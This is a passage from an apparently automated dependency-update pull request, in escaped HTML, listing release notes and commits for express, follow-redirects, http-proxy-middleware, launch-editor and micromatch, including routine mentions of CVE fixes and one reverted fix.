dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6909\"\u003eexpressjs/express#6909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6919\"\u003eexpressjs/express#6919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.22.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6921\"\u003eexpressjs/express#6921\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.2...4.22.0\"\u003ehttps://github.com/expressjs/express/compare/4.21.2...4.22.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/blob/v4.22.2/History.md\"\u003eexpress's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.22.2 / 2026-05-011\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003efix: restore \u0026gt;20 array parsing for \u003ccode\u003ereq.query\u003c/code\u003e repeated keys (\u003ca href=\"https://github.com/expressjs/express/commit/8d09bfe6d88983da5c3e12cfdd54782c4dc675db\"\u003e\u003ccode\u003e8d09bfe6\u003c/code\u003e\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThis also unifies array-cap behavior across notations. Indexed notation (\u003ccode\u003ea[0]=...\u003c/code\u003e) was historically capped at qs's default \u003ccode\u003earrayLimit\u003c/code\u003e of 20 even in older qs versions; after this change it also allows up to 1000 items.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: qs@~6.15.1\u003c/li\u003e\n\u003cli\u003edeps: body-parser@~1.20.5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.1 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRevert security fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.0 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.2 / 2024-11-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.12\n\u003cul\u003e\n\u003cli\u003eFix backtracking protection\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11\n\u003cul\u003e\n\u003cli\u003eThrows an error on invalid path values\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.1 / 2024-10-08\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported a fix for \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-47764\"\u003eCVE-2024-47764\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.0 / 2024-09-11\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eres.location(\u0026quot;back\u0026quot;)\u003c/code\u003e and \u003ccode\u003eres.redirect(\u0026quot;back\u0026quot;)\u003c/code\u003e magic string\u003c/li\u003e\n\u003cli\u003edeps: serve-static@1.16.2\n\u003cul\u003e\n\u003cli\u003eincludes send@0.19.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: finalhandler@1.3.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.20.0 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: serve-static@0.16.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: send@0.19.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: body-parser@0.6.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/df0abc9333a3398b97b71f6ea7cd77d5ea3e9f97\"\u003e\u003ccode\u003edf0abc9\u003c/code\u003e\u003c/a\u003e 4.22.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/836d36668ea750f78b4373b4de79bbd22634e6ec\"\u003e\u003ccode\u003e836d366\u003c/code\u003e\u003c/a\u003e \u003ccode\u003e4.x\u003c/code\u003e update qs to 6.15.1, body-parser 1.20.5 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/7224\"\u003e#7224\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/8d09bfe6d88983da5c3e12cfdd54782c4dc675db\"\u003e\u003ccode\u003e8d09bfe\u003c/code\u003e\u003c/a\u003e fix: restore array parsing for req.query repeated keys (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/7181\"\u003e#7181\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/d39e8ad1778a0b8a606a5a7b17096d0cc5ec722d\"\u003e\u003ccode\u003ed39e8ad\u003c/code\u003e\u003c/a\u003e deps: body-parser@~1.20.4 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/7021\"\u003e#7021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/efe85d9fdc9e3a62f7a1121b4f5f484862298b48\"\u003e\u003ccode\u003eefe85d9\u003c/code\u003e\u003c/a\u003e deps: qs@^6.14.1 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6972\"\u003e#6972\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/f62378e1bc776259c0a471476c2dc043a02ac762\"\u003e\u003ccode\u003ef62378e\u003c/code\u003e\u003c/a\u003e 📝 add note to history\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/12fae14531a78f19a2caaa5d4f58d9b01eaf3194\"\u003e\u003ccode\u003e12fae14\u003c/code\u003e\u003c/a\u003e 4.22.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/5ddf311af32e772a77fd48b6266ce2f1ba330e1a\"\u003e\u003ccode\u003e5ddf311\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;sec: security patch for CVE-2024-51999\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/49744abd1120484fe64d7bde1cd3197c32523b6e\"\u003e\u003ccode\u003e49744ab\u003c/code\u003e\u003c/a\u003e 4.22.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6e97452f600a3b01719fbc5517d833c7646b0bb7\"\u003e\u003ccode\u003e6e97452\u003c/code\u003e\u003c/a\u003e sec: security patch for CVE-2024-51999\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/express/compare/4.18.2...v4.22.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for express since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.2 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/21ef28a544c5e57f4c34b8476d75f2144609a1eb\"\u003e\u003ccode\u003e21ef28a\u003c/code\u003e\u003c/a\u003e Release version 1.15.11 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7c88135da3bd0681a7e156ee66b16b2f6f98b480\"\u003e\u003ccode\u003e7c88135\u003c/code\u003e\u003c/a\u003e Roll back tree shaking.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/6e389ba094beec211a8847788a146917a16c1bdb\"\u003e\u003ccode\u003e6e389ba\u003c/code\u003e\u003c/a\u003e Release version 1.15.10 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5bc496e0229abda823221e0c6267926a3f93f262\"\u003e\u003ccode\u003e5bc496e\u003c/code\u003e\u003c/a\u003e Shake me up before you go-go.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/694d6b47a42bc8377e5ef1480394de451e16bd5b\"\u003e\u003ccode\u003e694d6b4\u003c/code\u003e\u003c/a\u003e Bump minimist from 1.2.5 to 1.2.8\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.2...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `http-proxy-middleware` from 2.0.6 to 2.0.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/releases\"\u003ehttp-proxy-middleware's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.0.9\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(fixRequestBody): check readableLength by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1097\"\u003echimurai/http-proxy-middleware#1097\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(package): v2.0.9 by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1099\"\u003echimurai/http-proxy-middleware#1099\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.8...v2.0.9\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.8...v2.0.9\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.0.8\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(fixRequestBody): prevent multiple .write() calls by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1090\"\u003echimurai/http-proxy-middleware#1090\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(fixRequestBody): handle invalid request by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1091\"\u003echimurai/http-proxy-middleware#1091\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(package): v2.0.8 by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1094\"\u003echimurai/http-proxy-middleware#1094\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.7...v2.0.8\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.7...v2.0.8\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.0.7\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.7\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.7\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.0.7-beta.1\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.7-beta.0...v2.0.7-beta.1\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.7-beta.0...v2.0.7-beta.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.0.7-beta.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.7-beta.0\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.7-beta.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/blob/v2.0.9/CHANGELOG.md\"\u003ehttp-proxy-middleware's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/releases/tag/v2.0.9\"\u003ev2.0.9\u003c/a\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(fixRequestBody): check readableLength\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/releases/tag/v2.0.8\"\u003ev2.0.8\u003c/a\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(fixRequestBody): prevent multiple .write() calls\u003c/li\u003e\n\u003cli\u003efix(fixRequestBody): handle invalid request\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/releases/tag/v2.0.7\"\u003ev2.0.7\u003c/a\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eci(github actions): add publish.yml\u003c/li\u003e\n\u003cli\u003efix(filter): handle errors\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/617a7c9da9cc90ecc00b0c8b1c2f6a385c879cb1\"\u003e\u003ccode\u003e617a7c9\u003c/code\u003e\u003c/a\u003e chore(package): v2.0.9 (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1099\"\u003e#1099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/d22d58764832fea429d60109a19e1a23136d4425\"\u003e\u003ccode\u003ed22d587\u003c/code\u003e\u003c/a\u003e fix(fixRequestBody): check readableLength (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1097\"\u003e#1097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/d03d51b54ac8d40db8438a8b216cf1ea92bb7849\"\u003e\u003ccode\u003ed03d51b\u003c/code\u003e\u003c/a\u003e chore(package): v2.0.8 (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1094\"\u003e#1094\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/c50dd06d9102fbb81dd4cbad7a295dddee5f6e1e\"\u003e\u003ccode\u003ec50dd06\u003c/code\u003e\u003c/a\u003e fix(fixRequestBody): handle invalid request (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1091\"\u003e#1091\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/76a9d8d6dc2b971f63df19d805c7ab656540525b\"\u003e\u003ccode\u003e76a9d8d\u003c/code\u003e\u003c/a\u003e fix(fixRequestBody): prevent multiple .write() calls (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1090\"\u003e#1090\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/1e9233909839962bb3c1980848ad499b4757a71d\"\u003e\u003ccode\u003e1e92339\u003c/code\u003e\u003c/a\u003e ci(github-actions): fix npm tag\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/90afb7c9a658b32cc8fe08950bd0926d3bb512c1\"\u003e\u003ccode\u003e90afb7c\u003c/code\u003e\u003c/a\u003e chore(package): v2.0.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5\"\u003e\u003ccode\u003e0b4274e\u003c/code\u003e\u003c/a\u003e fix(filter): handle errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/1bd6dd578b1326ed7979c301e3f8eb0f228f5b6f\"\u003e\u003ccode\u003e1bd6dd5\u003c/code\u003e\u003c/a\u003e ci(github actions): add publish.yml\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `launch-editor` from 2.6.0 to 2.14.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/3f97c648307a70e7c930ba63f040e6ba8e72bc16\"\u003e\u003ccode\u003e3f97c64\u003c/code\u003e\u003c/a\u003e v2.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/0cc9550e05c35224a1f61914b9731723f78c06a7\"\u003e\u003ccode\u003e0cc9550\u003c/code\u003e\u003c/a\u003e fix: reject UNC paths (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/afd1ab907769adbb0fb76b564551f3cd24822ea6\"\u003e\u003ccode\u003eafd1ab9\u003c/code\u003e\u003c/a\u003e ci: run tests on mac and windows (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/136\"\u003e#136\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/0bfa328e4d2a70d3accd86645efde43a5a8fd931\"\u003e\u003ccode\u003e0bfa328\u003c/code\u003e\u003c/a\u003e test: add some tests for launch-editor package (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/135\"\u003e#135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/1b006ae00061e83628c884770df4869bac481ed3\"\u003e\u003ccode\u003e1b006ae\u003c/code\u003e\u003c/a\u003e chore: add README (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/383ef26fceaaab75e4f122bf833a8d457e187272\"\u003e\u003ccode\u003e383ef26\u003c/code\u003e\u003c/a\u003e v2.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/6277209316b28bd76b057a97fcdfa42da5adc181\"\u003e\u003ccode\u003e6277209\u003c/code\u003e\u003c/a\u003e ci: harden publish settings\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/520b2f787af1bbe3d2333d952547fc90f2c01bb3\"\u003e\u003ccode\u003e520b2f7\u003c/code\u003e\u003c/a\u003e fix(deps): update all non-major dependencies (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/129\"\u003e#129\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/475ac662aeaa40eebe319f76acf7bd7ff2aba5d5\"\u003e\u003ccode\u003e475ac66\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency lint-staged to v17 (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/130\"\u003e#130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/247bf1dfe2c75efb50f507d33c2c5a3cbf4e20d0\"\u003e\u003ccode\u003e247bf1d\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency yorkie to v2 (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/131\"\u003e#131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vitejs/launch-editor/compare/v2.6.0...v2.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for launch-editor since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `micromatch` from 4.0.4 to 4.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/micromatch/releases\"\u003emicromatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.0.8\u003c/h2\u003e\n\u003cp\u003eUltimate release that fixes both CVE-2024-4067 and CVE-2024-4068. We consider the issues low-priority, so even if you see automated scanners saying otherwise, don't be scared.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/micromatch/blob/master/CHANGELOG.md\"\u003emicromatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.0.8] - 2024-08-22\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebackported CVE-2024-4067 fix (from v4.0.6) over to 4.x branch\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.7] - 2024-05-22\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ethis is basically v4.0.5, with some README updates\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eit is vulnerable to CVE-2024-4067\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eUpdated braces to v3.0.3 to avoid CVE-2024-4068\u003c/li\u003e\n\u003cli\u003edoes NOT break API compatibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.6] - 2024-05-21\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003ehasBraces\u003c/code\u003e to check if a pattern contains braces.\u003c/li\u003e\n\u003cli\u003eFixes CVE-2024-4067\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBREAKS API COMPATIBILITY\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eShould be labeled as a major release, but it's not.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.1 - 4.0.5]\u003c/h2\u003e\n\u003ch2\u003e[4.0.0] - 2019-03-20\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onMatch\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onIgnore\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onResult\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBreaking changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRequire Node.js \u0026gt;= 8.6\u003c/li\u003e\n\u003cli\u003eRemoved support for passing an array of brace patterns to \u003ccode\u003emicromatch.braces()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eTo strictly enforce closing brackets (for \u003ccode\u003e{\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, and \u003ccode\u003e(\u003c/code\u003e), you must now use \u003ccode\u003estrictBrackets=true\u003c/code\u003e instead of 